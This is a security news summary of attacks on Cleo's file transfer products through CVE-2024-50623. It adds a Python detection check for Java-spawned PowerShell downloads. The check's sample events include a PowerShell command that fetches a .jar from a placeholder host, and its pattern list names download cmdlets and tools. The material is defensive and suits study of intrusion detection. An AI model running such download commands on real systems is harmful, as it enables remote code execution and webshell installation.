Exploitation of Cleo Products Despite Previous Patch

Learn about the importance of timely patch management and how vulnerabilities can still be exploited even after initial patches, highlighting the need for comprehensive security solutions.


A vulnerability in Cleo's Harmony, VLTrader, and LexiCom file management products is being actively exploited, even on systems thought to be patched, leading to unauthorized access and potential compromise of servers. Despite Cleo's previous patch efforts, the flaw allows attackers to execute remote code, impacting industries such as consumer products, food, and shipping. Huntress researchers observed these exploit attempts on numerous servers and provided detection rules and mitigation advice while Cleo works on a new patch. The attacks involve stealthy installation and deletion of autorun files and JAR files to maintain persistence, and Cleo users are advised to reconfigure their software to mitigate the impact.


Key Facts

Risks:

Zero-Day, Patch Management, Remote Code Execution

Keywords:

Cleo, Harmony, VLTrader, LexiCom, Zero-Day, Remote Code Execution, Vulnerability, Patch Management

CVE:

CVE-2024-50623

Affected:

Cleo Harmony, Cleo VLTrader, Cleo LexiCom, consumer products industry, food industry, trucking industry, shipping industry, Active Directory


Article Body

Renewed Exploitation of Cleo File Management Products

A vulnerability in Cleo's file management products—Harmony, VLTrader, and LexiCom—has led to mass exploitation, affecting thousands of servers. Despite Cleo's earlier patch for the CVE-2024-50623 vulnerability, attackers have found a way to exploit it, impacting industries like consumer products, food, trucking, and shipping.

The "Zero-Day-ish" Vulnerability

This issue has been termed "zero-day-ish" because, although Cleo addressed the vulnerability, attacks have persisted. Huntress, a security research firm, observed exploit attempts on over 1,700 Cleo servers and believes the actual number of affected servers may be higher. The situation is alarming, especially given its similarities to previous incidents such as the MOVEit MFT attacks.

Attack Methodology

The attack involves the unauthorized execution of remote code through Cleo's systems. Attackers use stealth techniques, installing autorun files on compromised servers that are deleted once they have been processed. The exploit leverages Cleo's Import functionality to execute malicious PowerShell commands. These commands contact external servers to retrieve JAR files with webshell capabilities, which the attackers also delete to cover their tracks.

Geographic Spread and Detection

Huntress noted exploit attempts originating from various countries, including Moldova, the Netherlands, Canada, Lithuania, and the US. Huntress has released Sigma rules to detect potential exploitation and suspicious PowerShell activity, along with indicators of compromise (IOCs).
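The PowerShell-download pattern described in the attack methodology lends itself to a simple process-creation check. The following is an added example, not code from the article and not one of Huntress's Sigma rules; it assumes Sysmon-style event fields, assumes that Cleo's products run under a Java host process (java.exe or javaw.exe), and uses only constructed sample events and a placeholder domain.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real Cleo telemetry.
# The Java parent path is a constructed placeholder; the javaw.exe parent reflects the assumption
# that Cleo's products execute commands from a Java host process.
SAMPLE_EVENTS = [
    {"ProcessId": 4412, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\CleoHost\jre\bin\javaw.exe",
     "CommandLine": r'powershell.exe -NoProfile -Command "Invoke-WebRequest http://example.invalid/p.jar -OutFile C:\tmp\p.jar"'},
    {"ProcessId": 4420, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -Command "Get-Date"'},
    {"ProcessId": 4500, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\CleoHost\jre\bin\java.exe",
     "CommandLine": r'pwsh.exe -c "Get-ChildItem C:\tmp"'},
    {"ProcessId": 4600, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\CleoHost\jre\bin\javaw.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# Cmdlets and tools commonly used to pull remote content, plus a URL or .jar reference.
DOWNLOAD_PATTERN = re.compile(r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b)", re.I)
URL_OR_JAR = re.compile(r"(https?://|\.jar\b)", re.I)
JAVA_HOSTS = ("java.exe", "javaw.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the list of reasons an event looks like the Cleo-style PowerShell stage (empty if benign)."""
    reasons = []
    if basename(event["Image"]) not in POWERSHELL:
        return reasons  # only PowerShell children are scored here
    if basename(event["ParentImage"]) in JAVA_HOSTS:
        reasons.append("powershell spawned by java host")
    cmd = event["CommandLine"]
    if DOWNLOAD_PATTERN.search(cmd) and URL_OR_JAR.search(cmd):
        reasons.append("remote download referencing URL or .jar")
    return reasons


def flag_suspicious(events):
    """Return (ProcessId, reasons) for every event with at least one reason."""
    return [(e["ProcessId"], classify(e)) for e in events if classify(e)]
```

Both reasons together match the behaviour the article describes; a Java-spawned PowerShell without a download is lower confidence and worth correlating with Cleo's own logs before acting.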

Response and Mitigation

Cleo is working on an updated patch, and Huntress advises users to reconfigure their software settings to limit the attack's impact. Specifically, Cleo users should delete the "Autorun Directory" field in their software configurations to mitigate code execution risks. However, this does not prevent the arbitrary file-write aspect of the exploit.

Conclusion

While Cleo is developing further patches, it's crucial for users to take immediate steps to protect their systems, such as moving affected servers behind a firewall. This incident underscores the need for robust patch management and vigilance against evolving threats.


Read More

https://www.theregister.com/2024/12/10/cleo_vulnerability/